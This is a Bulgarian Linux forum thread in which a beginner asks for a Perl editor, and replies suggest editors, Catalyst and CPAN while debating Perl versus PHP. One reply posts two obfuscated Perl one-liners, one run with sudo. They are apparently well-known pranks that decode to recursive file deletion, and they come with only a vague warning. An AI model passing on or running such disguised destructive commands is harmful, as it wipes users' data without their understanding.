Автор Тема: Съвет за редактор на Perl.  (Прочетена 7073 пъти)

elFO

  • Напреднали
  • *****
  • Публикации: 22
  • Distribution: Fedora 18
  • Window Manager: GNOME
  • Много питам!
    • Профил
Съвет за редактор на Perl.
« -: Dec 09, 2012, 00:16 »
Решил съм се да се уча на Perl , но поради простата причина, че съм бос в Linux средата, търся някакъв редактор, който да ми върши работа. Може и да е съвсем проста програма, която да ми показва резултата от изпълнението на един прост ".pl" файл (или скрипт). Може по подразбиране в терминала да има изобилие, точно за Perl , но аз не ги знам. Моля за дребен съвет. И трябва ли ми някаква допълнителна програма примерно като Апачи, ако реша да се развивам в интернет програмирането (примерно някакви web приложения)?

Edit:
Извинявам се за неудобството, че не съм преценил къде да си пусна темата. По-добре е в секцията за начинаещи, където е настройка на програми.
« Последна редакция: Dec 09, 2012, 00:35 от elFO »
Активен

А ти къщичка за пиленца правил ли си?!

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: Съвет за редактор на Perl.
« Отговор #1 -: Dec 09, 2012, 02:13 »
Ако искаш да се занимаваш с уеб програмиране, захвърли perl. Казвам ти го като човек, който на работа се налага да подържа едно уеб-базирано приложение, писано на perl. То е и едно от малкото неща, които са ми докарвали мисли за самоубийство. Ужасно депресиращо е да се занимаваш с мъртъв език с идиотска философия, липсваща (или ужасно _странно_ имплементирана) функционалност, в моят случай е и под формата на CGI скриптове. Template Toolkit-а може и да е било хубаво нещо, но мен ми напомня за 90-те. И като цяло, не не и не. Единственото хубаво нещо е понеже е има 50 начина да направиш нещо и нито един от тях не ти върши работа, почти винаги ти се налага да преоткриваш колелото. Преоткриването на колелото не е толкова лошо нещо, особено ако обичаш да правиш безсмислени експерименти.

PHP примерно, предвид всичките му дефекти и отново сбъркана философия, е на светлинни години от perl по отношение на разработване на уеб приложения. В Perl като език има нещо жестоко сбъркано.
Активен

"Knowledge is power" - France is Bacon

dejuren

  • Напреднали
  • *****
  • Публикации: 1025
  • Distribution: Ubuntu, RedHat
  • Window Manager: lxde KDE4
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #2 -: Dec 09, 2012, 03:05 »
Perl може или да го мразиш като gat3way, или да го обичаш като мен, средно положение няма.

Цитат
Типичната програма на perl изглежда така, като че програмиста си е бил главата в клавиатурата; и най-често така си е било
— Анонимус

Цитат
PHP — това е малко зло, създадено от некомпетентни новаци, а Perl — това е голямо и коварно зло, създано от умели, но извратени професионалисти.
— Jon Ribbens
   

Цитат
Perl (перла, бисер)
1) съкровище, драгоценност, нещо изключително в ред подобни (перла в короната)
2) нещо нелепо, смешно, безсмислено, в частност нелепо изказване (кандидатстудентски бисери)

 ;D

И разбира се нямаше как да мина без двата стълба на Perl:

Код
GeSHi (Perl):
  1. `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@%)=($!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;$_++;
  2. $_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`

Код
GeSHi (Perl):
  1. echo "test... test... test..." | sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Мислете му, ако пуснете някой от тях. Предупредени са всички, аз си измивам ръцете.
« Последна редакция: Dec 09, 2012, 03:20 от dejuren »
Активен

http://webchat.freenode.net/?channels=ubuntu-bg
The quieter you become, the more you are able to hear.
Две седмици цъкане с мишката спестяват два часа четене на документацията.

schemer

  • Напреднали
  • *****
  • Публикации: 49
  • Distribution: Debian
  • Window Manager: Gnome 2
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #3 -: Dec 09, 2012, 09:51 »
Като за начало може да използваш редактора на графичната ти среда (за пример в Gnome 2 това е gedit и може да се настрои да е поносим за писане на код (аз ползвам Emacs)).

Гейта не го слушай, той обича да преувеличава. Perl е нормален език и ако знаеш какво правиш - работи, ако не знаеш - няма да работи.

За уеб програмиране не ти трябва допълнителни външни програми. През cpan инсталираш Catalyst (http://www.catalystframework.org/), което разбира се има и вграден уеб сървър за по-лесен дебъг и тестване, и за по-бърза разработка.

Като съвет ще допълня - преди да учиш различните работни рамки си научи добре основните неща, защото рамките те улесняват, но не премахват писането на код.

@gat3way, ти за коя версия на Perl говориш?

Допълнение:
В терминала пишеш само "perl <script-name>.pl" и си готов. :)
« Последна редакция: Dec 09, 2012, 09:57 от schemer »
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: Съвет за редактор на Perl.
« Отговор #4 -: Dec 09, 2012, 13:32 »
5.8.нещоси.

Искам да поясня, че говоря конкретно за писане на уеб приложения. Иначе като начин за автоматизиране на разни задачи е ОК, има доста предимства пред bash скриптовете (най-малкото има масиви и reference-и примерно :) ). Дори бих казал че ми харесва.

Не знам, има няколко неща, свързани с уеб програмирането, които в perl направо вбесяват. Примерно и CGI модула, и Template Toolkit-а са ужасно дървени и в крайна сметка рано или късно стигаш дотам да принтиш HTML код. Има доста библиотеки, които почти правят това, което искаш, но не точно както искаш и накрая се оказва че не ти вършат работа и трябва да си правиш сам нещата (обикновено това става след като си започнал с тях).

Другото, което нервира е DBI-а, там има различни DBD драйвери и понеже искат нещата да стават горе-долу по същия начин, някои неща са нагаждани. В PHP има отделни библиотеки за работа с различните бази - сега може би това има недостатъци, но предпочитам подхода на PHP, където поне си сигурен че като правиш нещо, става точно това, което трябва да стане.

JSON се парсва/генерира по-криво на Perl, отколкото с json разширението на PHP.


И такива работи.
Активен

"Knowledge is power" - France is Bacon

Naka

  • Напреднали
  • *****
  • Публикации: 3395
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #5 -: Dec 09, 2012, 14:58 »
Kate - най обикновен текстови редактор от kde.

Perl води до мозъчни поражения.
Иначе PHP е 1000 пъти по-добър избор. На мен например в PHP страшно много ми допада изключително добрата документация - че даже и подкрепена с примери и много добри коментари.

Единственото хубаво нещо на perl е Perl Compatible Regular Expressions, но това е отделна библиотека и се използва и от PHP. Т.е няма нещо от Perl Regular Expressions, което да не можеш да направиш с PHP.

PHP примерно, предвид всичките му дефекти и отново сбъркана философия
Какво имаш в предвид за сбъркана философия?

Цитат
Типичната програма на perl изглежда така, като че програмиста си е бил главата в клавиатурата; и най-често така си е било
— Анонимус

Типичната програма на perl също изглежда така все едно котка се е разходила по клавитурата. Ако щете вярвайте ама като си пуснете котката по клавиатурата (особено в горният и край) и излиза вярна програмка на perl. :o

А относно писането на конзолни скриптове PHP е страшно добър избор. От една-две години пиша само конзолни скриптове на PHP и не виждам никакво ограничение от страна на PHP спрямо Perl. Не мога да разбера защо никой не пише конзолни скриптове на PHP - сигурно са някакви предрасъдаци или мода. Щото видите ли PHP бил само за ВЕБ.

 
« Последна редакция: Dec 09, 2012, 15:21 от Naka »
Активен

Perl - the only language that looks the same before and after encryption.

radoulov

  • Напреднали
  • *****
  • Публикации: 116
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #6 -: Dec 09, 2012, 15:45 »
[...]
Не мога да разбера защо никой не пише конзолни скриптове на PHP - сигурно са някакви предрасъдаци или мода. Щото видите ли PHP бил само за ВЕБ.

Една от причините, според мен, е, че default конфигурацията на повечето Unix варианти не предлага php interpreter.
Virtually всички модерни Unix варианти предлагат POSIX shell, Unix utilities и Perl, които са повече от достатъчни.
Активен

schemer

  • Напреднали
  • *****
  • Публикации: 49
  • Distribution: Debian
  • Window Manager: Gnome 2
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #7 -: Dec 09, 2012, 16:21 »
Naka, моля те, дай линкове към научните изследвания, които доказват, че Perl уврежда мозъка и PHP е 1000 пъти по-добър избор. :)

Ето една от любимите ми статии, които представят PHP - http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/ :)

Останалите неща няма да ги коментирам - субективни са.

Само да припомня част от философията на Perl - "Има повече от един начин да направите нещо". По принцип казват, че Perl се опитва да ви предложи всички начини, но ако той не е достатъчен, то може да пробвате някои от тези езици - http://search.cpan.org/modlist/Language_Extensions/Inline :D

Допълнение :
Ама какви неща/оправдания/ може да измислят хората, когато ги мързи да научат нещо ново...  :)
« Последна редакция: Dec 09, 2012, 16:31 от schemer »
Активен

b2l

  • Напреднали
  • *****
  • Публикации: 4786
  • Distribution: MCC Interim
  • Window Manager: - // - // -
  • ...sometimes I feel like screaming... || RTFM!
    • Профил
    • WWW
Re: Съвет за редактор на Perl.
« Отговор #8 -: Dec 09, 2012, 18:51 »
Ето една от любимите ми статии, които представят PHP - http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/ :)

Това е статия в блог. Ако в моя блог напиша, че Perl е говняв език ще е също толкова достоверно колкото тази твоя любима статия.
Активен

"Човекът е въже, опънато между звяра и свръхчовека, въже над пропаст. Човекът е нещо, което трябва да бъде превъзмогнато." - Фр. Ницше

schemer

  • Напреднали
  • *****
  • Публикации: 49
  • Distribution: Debian
  • Window Manager: Gnome 2
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #9 -: Dec 09, 2012, 19:16 »
b2l, ако я напишеш така убедително, както е написана "PHP: a fractal of bad design" - ще ѝ повярвам :)
« Последна редакция: Dec 09, 2012, 19:18 от schemer »
Активен

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: Съвет за редактор на Perl.
« Отговор #10 -: Dec 09, 2012, 20:43 »
Цитат
Ето една от любимите ми статии, които представят PHP - http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/

Всичко описано там е вярно, на места малко пресилено, но е вярно. Проблемът е че човек ако тръгне да се възмущава от същите неща в perl, ще му трябват няколко такива статии.

С това не искам да създавам спорове perl <-> php. Искам само да кажа, че PHP е по-подходящ избор в доста случаи. Апропо навремето и аз имах навика да пиша конзолни скриптове на PHP. В момента предпочитам Perl за целта, особено ако не се налага някой да гледа какви съм ги пляскал вътре.
Активен

"Knowledge is power" - France is Bacon

Naka

  • Напреднали
  • *****
  • Публикации: 3395
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #11 -: Dec 09, 2012, 22:07 »
В момента предпочитам Perl за целта, особено ако не се налага някой да гледа какви съм ги пляскал вътре.

А след месец-два можеш ли да си разбереш кода. Щото аз даже и след седмица не мога. То това беше главната причина за зе****ба Perl... Щото след това ми трябваха огромни усиля да разбера собственият си код.... А за чужд код да не говорим.
Активен

Perl - the only language that looks the same before and after encryption.

elFO

  • Напреднали
  • *****
  • Публикации: 22
  • Distribution: Fedora 18
  • Window Manager: GNOME
  • Много питам!
    • Профил
Re: Съвет за редактор на Perl.
« Отговор #12 -: Dec 09, 2012, 22:27 »
Виждам, че има интерес към темата, което ме радва. Решил съм да уча езика, а това означава, че ако езика предоставя възможност за Web приложения, значи, че вероятно един ден ще ми се наложи да се сблъскам и с тях. Не виждам какво лошо има да решиш един проблем по 50 начина. Все пак ако имаш акъл в главата си всеки път ще го решаваш, вместо да учиш наизуст определени конструкции. PHP общо взето не мога да го дишам, но на който му е удобен, приятен и интуитивен да си го ползва. Все пак въпроса ми е свързан с Perl. Като начало и простата команда "perl "/path/name_script.pl" " върши някаква работа. В началото ще са прости скриптове. Преди време, като новина на сайта (на този) се появи, че някаква група започва превод на ръководство за Perl на български. Идея имате ли до къде е стигнал проекта и за коя версия на езика става въпрос, че аз имам един материал, но е за версия 3.0.0 и още в самото начало с едни единични кавички ' . ' в конзолата ми даде някаква грешка. Въпросните единични кавички трябва да крият резултата (до колкото разбрах де). В случая нещо не се получиха нещата и в терминала ми се изписа грешка на въпросният ред. Предполагам, че е от остарялата версия и нещо са променили в езика. Затова да не се пуля тъпо и предано пред терминала за напред, вероятно ще ми е нужно малко по-актуално ръководство. Пробвах да си инсталирам Komodo (редактор на доста езици включително и Perl), но ми дава някакви проблеми с някакви зависимости с Java6 пакети, при което при опит да ги инсталирам ми дава, че липсват други пакети, а когато опитам и другите пакети да инсталирам пак ми дава, че има някакви неоправени зависимости на пакети и влизам в някакъв омагьосан кръг, в който не мога да инсталирам 2 различни пакета, защото са взаимно зависими и двата едновременно липсват. Пробвах да ги инсталирам едновременно (и пак не стана :d).
А този cpan през, който трябва да инсталирам Catalyst , нищо не ми говори (това със web сървъра ме заинтригува). Просто искам да знам, че ще си реша проблема още сега с една среда и че в последствие няма да ми се налага да се ровя, за да намеря дебъг за някое web приложение, ако се наложи разбира се.
Активен

А ти къщичка за пиленца правил ли си?!

gat3way

  • Напреднали
  • *****
  • Публикации: 6050
  • Relentless troll
    • Профил
    • WWW
Re: Съвет за редактор на Perl.
« Отговор #13 -: Dec 09, 2012, 23:17 »
Цитат
А след месец-два можеш ли да си разбереш кода. Щото аз даже и след седмица не мога. То това беше главната причина за зе****ба Perl... Щото след това ми трябваха огромни усиля да разбера собственият си код.... А за чужд код да не говорим.

Може, но трябва да си наложиш правила как да го пишеш и да си ги спазваш :) Което е големият проблем когато няколко човека работят върху едно и също - става каша.

Активен

"Knowledge is power" - France is Bacon

Demayl

  • Напреднали
  • *****
  • Публикации: 104
  • Distribution: XUbuntu,FreeBSD
  • Window Manager: Xfce
    • Профил
    • WWW
Re: Съвет за редактор на Perl.
« Отговор #14 -: Dec 10, 2012, 01:38 »
Аз лично за Perl ползвам Vim, но като за графичен редактор става geany . Perl си е много ок като език и ако го знаеш няма как да не си разбереш кода дори и чуждия .
http://perldoc.perl.org/ ето ти информация за езика ( тук може да немериш всичко за езика )
http://search.cpan.org/ тук си гледаш модулите . Хубаво е да ги инсталираш от дистрибуцията ти, ако не стане - в терминала : perl -MCPAN -e shell и ще ти излезе шела на CPAN и от там си инсталираш .
Хубавото на perl спрямо php за мен е че в perl имаш ~200 функции , а в PHP core са ти 1500+ , но трябва да научиш стотици тънкости  ;D  [_]3 [_]3
Активен


Подобни теми
Заглавие Започната от Отговора Прегледи Последна публикация
Кирилица и Perl
Общ форум
ivanatora 2 2740 Последна публикация Mar 08, 2005, 18:45
от picmaster
Трасиране на стека на perl
Web development
CaBA 8 4641 Последна публикация May 18, 2005, 20:48
от CaBA
perl-DBI
Настройка на програми
overclocked 0 1574 Последна публикация May 15, 2005, 12:34
от overclocked
Perl и md5
Web development
batsve 11 4282 Последна публикация Aug 05, 2005, 15:01
от batsve
Редактиране на PDF документи с Perl
Общ форум
mhydra 5 3835 Последна публикация Aug 22, 2005, 08:30
от